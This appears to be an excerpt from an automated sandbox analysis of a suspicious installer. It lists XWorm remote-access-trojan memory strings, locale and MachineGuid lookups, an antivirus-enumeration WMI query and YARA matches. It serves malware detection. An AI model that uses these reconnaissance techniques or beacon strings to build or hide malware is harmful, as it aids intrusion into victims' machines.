Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Program Manager |
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Program Managert-^q |
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0 |
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0 |
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C21720 cpuid |
0_2_00C21720 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, |
0_2_00C349CA |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, |
0_2_00C34AA4 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
0_2_00C2FAAD |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, |
0_2_00C2FBA2 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, |
0_2_00C2FCA4 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, |
0_2_00C2FC49 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: GetLocaleInfoA, |
0_2_00C34D69 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, |
0_2_00C2FE75 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, |
0_2_00C2FFD8 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, |
0_2_00C2FF9C |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, |
0_2_00C2FF35 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C24CAA GetSystemTimeAsFileTime,__aulldiv, |
0_2_00C24CAA |
Source: C:\Users\user\Desktop\33__Installer.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct |
Source: Yara match |
File source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 33__Installer.exe PID: 6556, type: MEMORYSTR |
Source: Yara match |
File source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 33__Installer.exe PID: 6556, type: MEMORYSTR |